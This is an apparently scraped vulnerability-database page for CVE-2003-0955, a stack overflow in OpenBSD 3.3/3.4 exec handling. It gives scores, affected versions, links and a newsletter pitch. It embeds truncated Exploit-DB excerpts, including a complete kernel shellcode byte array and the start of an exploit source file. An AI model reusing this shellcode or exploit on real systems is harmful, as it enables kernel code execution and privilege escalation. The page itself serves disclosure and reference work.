CVE-2003-0955
published 2003-12-15CVE-2003-0955: OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service (kernel panic) and possibly execute arbitrary code in 3.4 via a program with an…
PriorityP423medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.14%
62.7th percentile
OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service (kernel panic) and possibly execute arbitrary code in 3.4 via a program with an invalid header that is not properly handled by (1) ibcs2_exec.c in the iBCS2 emulation (compat_ibcs2) or (2) exec_elf.c, which leads to a stack-based buffer overflow.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openbsd | openbsd | — | — |
| openbsd | openbsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow
exploitdb·2003-11-19
CVE-2003-0955 OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow
OpenBSD 2.x
#include
#include
#include
#include
#include
#include
//#include "ibcs2_exec.h"
/* kernel_sc.s shellcode */
/* much improved the opcode search, fixed the stupid logic bug! */
unsigned char shellcode[] =
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
"\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
"\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
"\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
"\x75\xef\x47\x31\xc0\x57\xc3";
/* do not use! */
/*
silvio gotta get his brain toge
Exploit-DB
OpenBSD - 'ibcs2_exec' Kernel Code Execution
exploitdb·2003-11-07
CVE-2003-0955 OpenBSD - 'ibcs2_exec' Kernel Code Execution
OpenBSD - 'ibcs2_exec' Kernel Code Execution
---
//
// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
//
#include
#include
#include
#include
/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */
/*
* Copyright (c) 1994, 1995 Scott Bartram
* All rights reserved.
*
* adapted from sys/sys/exec_ecoff.h
* based on Intel iBCS2
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, t
No writeups or analysis indexed.
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patchhttp://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013315.htmlhttp://marc.info/?l=openbsd-security-announce&m=106808820119679&w=2http://marc.info/?l=openbsd-security-announce&m=106917441524978&w=2http://www.guninski.com/msuxobsd2.htmlhttp://www.openbsd.org/errata33.htmlhttp://www.securityfocus.com/bid/8978ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patchhttp://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013315.htmlhttp://marc.info/?l=openbsd-security-announce&m=106808820119679&w=2http://marc.info/?l=openbsd-security-announce&m=106917441524978&w=2http://www.guninski.com/msuxobsd2.htmlhttp://www.openbsd.org/errata33.htmlhttp://www.securityfocus.com/bid/8978
2003-12-15
Published